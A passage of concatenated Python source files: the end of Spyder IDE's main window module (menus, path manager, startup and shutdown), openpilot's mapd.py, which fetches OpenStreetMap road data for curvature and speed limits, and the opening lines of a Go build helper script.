"</tt><br><br>in <tt>Preferences > Application > "
"Interface</tt>, in case Spyder is not displayed "
"correctly.<br><br>"
"Do you want to restart Spyder?"))
msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(
_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(self.dpi_change_dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.finished.connect(
lambda result: self.handle_dpi_change_response(result, dpi))
msgbox.open()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
# TODO: Remove self.projects reference once there's an API for setting
# window title.
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
with open(self.SPYDER_PATH, 'r', encoding='utf-8') as f:
path = f.read().splitlines()
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
with open(self.SPYDER_NOT_ACTIVE_PATH, 'r',
encoding='utf-8') as f:
not_active_path = f.read().splitlines()
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(reset=reset)
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.layouts.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
# when are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.pre_visible_setup()
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Propagate current configurations to all configuration observers
CONF.notify_all_observers()
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
mapd.py
|
#!/usr/bin/env python3
# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
from common.basedir import BASEDIR
try:
from scipy import spatial
except ImportError as e:
import os
import sys
openblas_path = os.path.join(BASEDIR, "phonelibs/openblas/")
os.environ['LD_LIBRARY_PATH'] += ':' + openblas_path
args = [sys.executable]
args.extend(sys.argv)
os.execv(sys.executable, args)
DEFAULT_SPEEDS_BY_REGION_JSON_FILE = BASEDIR + "/selfdrive/mapd/default_speeds_by_region.json"
from selfdrive.mapd import default_speeds_generator
default_speeds_generator.main(DEFAULT_SPEEDS_BY_REGION_JSON_FILE)
import os
import sys
import time
import zmq
import threading
import numpy as np
import overpy
from collections import defaultdict
from common.params import Params
from common.transformations.coordinates import geodetic2ecef
from cereal.services import service_list
import cereal.messaging as messaging
from selfdrive.mapd.mapd_helpers import MAPS_LOOKAHEAD_DISTANCE, Way, circle_through_points
import selfdrive.crash as crash
from selfdrive.version import version, dirty
OVERPASS_API_URL = "https://overpass.kumi.systems/api/interpreter"
OVERPASS_HEADERS = {
'User-Agent': 'NEOS (comma.ai)',
'Accept-Encoding': 'gzip'
}
last_gps = None
query_lock = threading.Lock()
last_query_result = None
last_query_pos = None
cache_valid = False
def build_way_query(lat, lon, radius=50):
"""Builds a query to find all highways within a given radius around a point"""
pos = " (around:%f,%f,%f)" % (radius, lat, lon)
lat_lon = "(%f,%f)" % (lat, lon)
q = """(
way
""" + pos + """
[highway][highway!~"^(footway|path|bridleway|steps|cycleway|construction|bus_guideway|escape)$"];
>;);out;""" + """is_in""" + lat_lon + """;area._[admin_level~"[24]"];
convert area ::id = id(), admin_level = t['admin_level'],
name = t['name'], "ISO3166-1:alpha2" = t['ISO3166-1:alpha2'];out;
"""
return q
def query_thread():
global last_query_result, last_query_pos, cache_valid
api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=10.)
while True:
time.sleep(1)
if last_gps is not None:
fix_ok = last_gps.flags & 1
if not fix_ok:
continue
if last_query_pos is not None:
cur_ecef = geodetic2ecef((last_gps.latitude, last_gps.longitude, last_gps.altitude))
prev_ecef = geodetic2ecef((last_query_pos.latitude, last_query_pos.longitude, last_query_pos.altitude))
dist = np.linalg.norm(cur_ecef - prev_ecef)
if dist < 1000: #updated when we are 1km from the edge of the downloaded circle
continue
if dist > 3000:
cache_valid = False
q = build_way_query(last_gps.latitude, last_gps.longitude, radius=3000)
try:
new_result = api.query(q)
# Build kd-tree
nodes = []
real_nodes = []
node_to_way = defaultdict(list)
location_info = {}
for n in new_result.nodes:
nodes.append((float(n.lat), float(n.lon), 0))
real_nodes.append(n)
for way in new_result.ways:
for n in way.nodes:
node_to_way[n.id].append(way)
for area in new_result.areas:
if area.tags.get('admin_level', '') == "2":
location_info['country'] = area.tags.get('ISO3166-1:alpha2', '')
if area.tags.get('admin_level', '') == "4":
location_info['region'] = area.tags.get('name', '')
nodes = np.asarray(nodes)
nodes = geodetic2ecef(nodes)
tree = spatial.cKDTree(nodes)
query_lock.acquire()
last_query_result = new_result, tree, real_nodes, node_to_way, location_info
last_query_pos = last_gps
cache_valid = True
query_lock.release()
except Exception as e:
print(e)
query_lock.acquire()
last_query_result = None
query_lock.release()
def mapsd_thread():
global last_gps
gps_sock = messaging.sub_sock('gpsLocation', conflate=True)
gps_external_sock = messaging.sub_sock('gpsLocationExternal', conflate=True)
map_data_sock = messaging.pub_sock('liveMapData')
cur_way = None
curvature_valid = False
curvature = None
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
while True:
gps = messaging.recv_one(gps_sock)
gps_ext = messaging.recv_one_or_none(gps_external_sock)
if gps_ext is not None:
gps = gps_ext.gpsLocationExternal
else:
gps = gps.gpsLocation
last_gps = gps
fix_ok = gps.flags & 1
if not fix_ok or last_query_result is None or not cache_valid:
cur_way = None
curvature = None
curvature_valid = False
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
map_valid = False
else:
map_valid = True
lat = gps.latitude
lon = gps.longitude
heading = gps.bearing
speed = gps.speed
query_lock.acquire()
cur_way = Way.closest(last_query_result, lat, lon, heading, cur_way)
if cur_way is not None:
pnts, curvature_valid = cur_way.get_lookahead(lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
xs = pnts[:, 0]
ys = pnts[:, 1]
road_points = [float(x) for x in xs], [float(y) for y in ys]
if speed < 10:
curvature_valid = False
if curvature_valid and pnts.shape[0] <= 3:
curvature_valid = False
# The curvature is valid when at least MAPS_LOOKAHEAD_DISTANCE of road is found
if curvature_valid:
# Compute the curvature for each point
with np.errstate(divide='ignore'):
circles = [circle_through_points(*p) for p in zip(pnts, pnts[1:], pnts[2:])]
circles = np.asarray(circles)
radii = np.nan_to_num(circles[:, 2])
radii[radii < 10] = np.inf
curvature = 1. / radii
# Index of closest point
closest = np.argmin(np.linalg.norm(pnts, axis=1))
dist_to_closest = pnts[closest, 0] # We can use x distance here since it should be close
# Compute distance along path
dists = list()
dists.append(0)
for p, p_prev in zip(pnts, pnts[1:, :]):
dists.append(dists[-1] + np.linalg.norm(p - p_prev))
dists = np.asarray(dists)
dists = dists - dists[closest] + dist_to_closest
dists = dists[1:-1]
close_idx = np.logical_and(dists > 0, dists < 500)
dists = dists[close_idx]
curvature = curvature[close_idx]
if len(curvature):
# TODO: Determine left or right turn
curvature = np.nan_to_num(curvature)
# Outlier rejection
new_curvature = np.percentile(curvature, 90, interpolation='lower')
k = 0.6
upcoming_curvature = k * upcoming_curvature + (1 - k) * new_curvature
in_turn_indices = curvature > 0.8 * new_curvature
if np.any(in_turn_indices):
dist_to_turn = np.min(dists[in_turn_indices])
else:
dist_to_turn = 999
else:
upcoming_curvature = 0.
dist_to_turn = 999
query_lock.release()
dat = messaging.new_message('liveMapData')
if last_gps is not None:
dat.liveMapData.lastGps = last_gps
if cur_way is not None:
dat.liveMapData.wayId = cur_way.id
# Speed limit
max_speed = cur_way.max_speed()
if max_speed is not None:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = max_speed
# TODO: use the function below to anticipate upcoming speed limits
#max_speed_ahead, max_speed_ahead_dist = cur_way.max_speed_ahead(max_speed, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
#if max_speed_ahead is not None and max_speed_ahead_dist is not None:
# dat.liveMapData.speedLimitAheadValid = True
# dat.liveMapData.speedLimitAhead = float(max_speed_ahead)
# dat.liveMapData.speedLimitAheadDistance = float(max_speed_ahead_dist)
advisory_max_speed = cur_way.advisory_max_speed()
if advisory_max_speed is not None:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = advisory_max_speed
# Curvature
dat.liveMapData.curvatureValid = curvature_valid
dat.liveMapData.curvature = float(upcoming_curvature)
dat.liveMapData.distToTurn = float(dist_to_turn)
if road_points is not None:
dat.liveMapData.roadX, dat.liveMapData.roadY = road_points
if curvature is not None:
dat.liveMapData.roadCurvatureX = [float(x) for x in dists]
dat.liveMapData.roadCurvature = [float(x) for x in curvature]
dat.liveMapData.mapValid = map_valid
map_data_sock.send(dat.to_bytes())
def main():
params = Params()
dongle_id = params.get("DongleId")
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
crash.install()
main_thread = threading.Thread(target=mapsd_thread)
main_thread.daemon = True
main_thread.start()
q_thread = threading.Thread(target=query_thread)
q_thread.daemon = True
q_thread.start()
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
go_tool.py
|
from __future__ import absolute_import
import argparse
import copy
import json
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import six
from functools import reduce
arc_project_prefix = 'a.yandex-team.ru/'
std_lib_prefix = 'contrib/go/_std/src/'
vendor_prefix = 'vendor/'
vet_info_ext = '.vet.out'
vet_report_ext = '.vet.txt'
FIXED_CGO1_SUFFIX='.fixed.cgo1.go'
COMPILE_OPTIMIZATION_FLAGS=('-N',)
def get_trimpath_args(args):
return ['-trimpath', args.trimpath] if args.trimpath else []
def preprocess_cgo1(src_path, dst_path, source_root):
with open(src_path, 'r') as f:
content = f.read()
